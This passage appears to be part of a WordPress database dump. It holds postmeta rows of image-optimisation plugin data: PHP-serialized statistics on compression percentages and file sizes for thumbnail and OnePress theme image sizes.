p_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:360;s:11:\"size_before\";i:4166;s:10:\"size_after\";i:3806;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1005;s:11:\"size_before\";i:10955;s:10:\"size_after\";i:9950;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:549;s:11:\"size_before\";i:9400;s:10:\"size_after\";i:8851;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1532;s:11:\"size_before\";i:20295;s:10:\"size_after\";i:18763;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2298;s:11:\"size_before\";i:24364;s:10:\"size_after\";i:22066;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4082,2553,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.277951964475914081731389160268008708953857421875;s:5:\"bytes\";i:11036;s:11:\"size_before\";i:133318;s:10:\"size_after\";i:122282;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:314;s:11:\"size_before\";i:3775;s:10:\"size_after\";i:3461;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1040;s:11:\"size_before\";i:10754;s:10:\"size_after\";i:9714;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:5558;s:11:\"size_before\";i:55268;s:10:\"size_after\";i:49710;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:483;s:11:\"size_before\";i:7856;s:10:\"size_after\";i:7373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1415;s:11:\"size_before\";i:20888;s:10:\"size_after\";i:19473;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2226;s:11:\"size_before\";i:34777;s:10:\"size_after\";i:32551;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4083,2547,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.55042847725774546319144064909778535366058349609375;s:5:\"bytes\";i:5727;s:11:\"size_before\";i:75850;s:10:\"size_after\";i:70123;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:316;s:11:\"size_before\";i:5218;s:10:\"size_after\";i:4902;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:475;s:11:\"size_before\";i:7926;s:10:\"size_after\";i:7451;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:676;s:11:\"size_before\";i:10201;s:10:\"size_after\";i:9525;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1945;s:11:\"size_before\";i:23478;s:10:\"size_after\";i:21533;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2315;s:11:\"size_before\";i:29027;s:10:\"size_after\";i:26712;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4084,2546,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:633872;s:10:\"size_after\";i:633872;s:4:\"time\";d:0.7800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:23713;s:10:\"size_after\";i:23713;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33325;s:10:\"size_after\";i:33325;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:185367;s:10:\"size_after\";i:185367;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:41022;s:10:\"size_after\";i:41022;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:128823;s:10:\"size_after\";i:128823;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:221622;s:10:\"size_after\";i:221622;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}}}'),(4085,2544,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.2583377369584471949792714440263807773590087890625;s:5:\"bytes\";i:13783;s:11:\"size_before\";i:134359;s:10:\"size_after\";i:120576;s:4:\"time\";d:0.08999999999999998279154311831007362343370914459228515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:434;s:11:\"size_before\";i:4553;s:10:\"size_after\";i:4119;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:672;s:11:\"size_before\";i:6076;s:10:\"size_after\";i:5404;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:2508;s:11:\"size_before\";i:24727;s:10:\"size_after\";i:22219;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:4000;s:11:\"size_before\";i:39151;s:10:\"size_after\";i:35151;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:840;s:11:\"size_before\";i:8567;s:10:\"size_after\";i:7727;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2091;s:11:\"size_before\";i:19723;s:10:\"size_after\";i:17632;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3238;s:11:\"size_before\";i:31562;s:10:\"size_after\";i:28324;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4086,2542,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.8549793923128543582379279541783034801483154296875;s:5:\"bytes\";i:4530;s:11:\"size_before\";i:41732;s:10:\"size_after\";i:37202;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:411;s:11:\"size_before\";i:4396;s:10:\"size_after\";i:3985;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:595;s:11:\"size_before\";i:5207;s:10:\"size_after\";i:4612;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:734;s:11:\"size_before\";i:7759;s:10:\"size_after\";i:7025;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1239;s:11:\"size_before\";i:10510;s:10:\"size_after\";i:9271;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1551;s:11:\"size_before\";i:13860;s:10:\"size_after\";i:12309;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4087,2541,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.5495661320010523098744670278392732143402099609375;s:5:\"bytes\";i:2006;s:11:\"size_before\";i:19015;s:10:\"size_after\";i:17009;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:443;s:11:\"size_before\";i:4522;s:10:\"size_after\";i:4079;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:596;s:11:\"size_before\";i:5895;s:10:\"size_after\";i:5299;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.25;s:5:\"bytes\";i:967;s:11:\"size_before\";i:8598;s:10:\"size_after\";i:7631;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4088,2539,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:262435;s:10:\"size_after\";i:262435;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31153;s:10:\"size_after\";i:31153;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:43253;s:10:\"size_after\";i:43253;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:62122;s:10:\"size_after\";i:62122;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:125907;s:10:\"size_after\";i:125907;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}}}'),(4089,2538,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.75596010198148189118683148990385234355926513671875;s:5:\"bytes\";i:1734;s:11:\"size_before\";i:22357;s:10:\"size_after\";i:20623;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:705;s:11:\"size_before\";i:5470;s:10:\"size_after\";i:4765;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:404;s:11:\"size_before\";i:6871;s:10:\"size_after\";i:6467;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:625;s:11:\"size_before\";i:10016;s:10:\"size_after\";i:9391;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4090,2537,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.01093111213134824455384119801237829960882663726806640625;s:5:\"bytes\";i:30;s:11:\"size_before\";i:274446;s:10:\"size_after\";i:274416;s:4:\"time\";d:0.67000000000000003996802888650563545525074005126953125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.13000000000000000444089209850062616169452667236328125;s:5:\"bytes\";i:30;s:11:\"size_before\";i:23686;s:10:\"size_after\";i:23656;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31851;s:10:\"size_after\";i:31851;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31397;s:10:\"size_after\";i:31397;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:86985;s:10:\"size_after\";i:86985;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:100527;s:10:\"size_after\";i:100527;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4091,2536,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:796372;s:10:\"size_after\";i:796372;s:4:\"time\";d:0.5300000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:40097;s:10:\"size_after\";i:40097;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:107598;s:10:\"size_after\";i:107598;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:81428;s:10:\"size_after\";i:81428;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:221071;s:10:\"size_after\";i:221071;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:346178;s:10:\"size_after\";i:346178;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4092,2535,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:643384;s:10:\"size_after\";i:643384;s:4:\"time\";d:0.4699999999999999733546474089962430298328399658203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34236;s:10:\"size_after\";i:34236;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:82969;s:10:\"size_after\";i:82969;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:69727;s:10:\"size_after\";i:69727;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:173584;s:10:\"size_after\";i:173584;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:282868;s:10:\"size_after\";i:282868;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4093,2534,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:680986;s:10:\"size_after\";i:680986;s:4:\"time\";d:0.7399999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34905;s:10:\"size_after\";i:34905;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:85335;s:10:\"size_after\";i:85335;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:73729;s:10:\"size_after\";i:73729;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:191163;s:10:\"size_after\";i:191163;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:295854;s:10:\"size_after\";i:295854;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4094,2533,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.598979386584885364896990722627379000186920166015625;s:5:\"bytes\";i:5803;s:11:\"size_before\";i:362919;s:10:\"size_after\";i:357116;s:4:\"time\";d:0.5800000000000000710542735760100185871124267578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.189999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:754;s:11:\"size_before\";i:23615;s:10:\"size_after\";i:22861;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4760;s:11:\"size_before\";i:70658;s:10:\"size_after\";i:65898;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.63000000000000000444089209850062616169452667236328125;s:5:\"bytes\";i:289;s:11:\"size_before\";i:45527;s:10:\"size_after\";i:45238;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:100718;s:10:\"size_after\";i:100718;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:122401;s:10:\"size_after\";i:122401;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4095,2532,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:680597;s:10:\"size_after\";i:680597;s:4:\"time\";d:0.54000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34714;s:10:\"size_after\";i:34714;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:111209;s:10:\"size_after\";i:111209;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:76543;s:10:\"size_after\";i:76543;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:209121;s:10:\"size_after\";i:209121;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:249010;s:10:\"size_after\";i:249010;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4096,2531,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.2235621772165590215308839106000959873199462890625;s:5:\"bytes\";i:1562;s:11:\"size_before\";i:36983;s:10:\"size_after\";i:35421;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:211;s:11:\"size_before\";i:5161;s:10:\"size_after\";i:4950;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:349;s:11:\"size_before\";i:7311;s:10:\"size_after\";i:6962;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:327;s:11:\"size_before\";i:8690;s:10:\"size_after\";i:8363;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:675;s:11:\"size_before\";i:15821;s:10:\"size_after\";i:15146;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4097,2529,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.28868284342736938441476013395003974437713623046875;s:5:\"bytes\";i:3217;s:11:\"size_before\";i:60828;s:10:\"size_after\";i:57611;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:361;s:11:\"size_before\";i:6685;s:10:\"size_after\";i:6324;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:862;s:11:\"size_before\";i:16900;s:10:\"size_after\";i:16038;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:563;s:11:\"size_before\";i:12243;s:10:\"size_after\";i:11680;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.71999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1431;s:11:\"size_before\";i:25000;s:10:\"size_after\";i:23569;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4098,2528,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.78877930062764090024529650690965354442596435546875;s:5:\"bytes\";i:2120;s:11:\"size_before\";i:31228;s:10:\"size_after\";i:29108;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:509;s:11:\"size_before\";i:7322;s:10:\"size_after\";i:6813;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.46999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:701;s:11:\"size_before\";i:10828;s:10:\"size_after\";i:10127;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-